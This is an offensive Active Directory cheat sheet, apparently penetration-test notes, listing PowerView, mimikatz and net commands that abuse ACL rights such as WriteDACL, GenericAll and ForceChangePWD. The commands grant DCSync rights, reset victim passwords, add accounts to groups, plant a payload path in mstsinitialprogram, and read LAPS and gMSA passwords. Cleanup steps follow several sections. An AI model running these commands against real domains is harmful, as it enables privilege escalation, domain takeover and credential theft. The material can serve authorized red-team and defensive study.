Security descriptors

References

WriteDACL

Abuse
Add-ObjectACL -PrincipalIdentity <user> -Rights DCSync
Cleanup
Remove-DomainObjectACL

ForceChangePWD

Abuse
mimikatz lsadump::setntlm

1 - Connect as the user with ForceChangePWD right (OPTIONAL)

$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $SecPassword)

2 - Change the password of victim

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

AddMembers

Abuse
net group '<group>' <user> /domain /add
Add-DomainGroupMember -Identity '<group>' -Members <user>
Cleanup
net group '<group>' <user> /domain /delete
Remove-DomainGroupMember -Identity '<group>' -Members <user>

GenericAll

Abuse
Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose
Cleanup
Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

GenericWrite

Abuse
Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose
Cleanup
Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

WriteOwner

Abuse
Set-DomainObjectOwner -Identity <vicitim> -OwnerIdentity <controlled_user>
Cleanup
Set-DomainObjectOwner

AllExtentedRights

Abuse
Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

Add-DomainObjectAcl -TargetIdentity <fqdn_domain> -PrincipalIdentity <user> -Rights DCSync -Verbose 

Over a computer

Get-DomainComputer <computer_name> -Properties samaccountname,ms-mcs-admpwd
$gmsa = Get-ADServiceAccount -Identity '<user>' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp # DSInternals module
Cleanup
Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose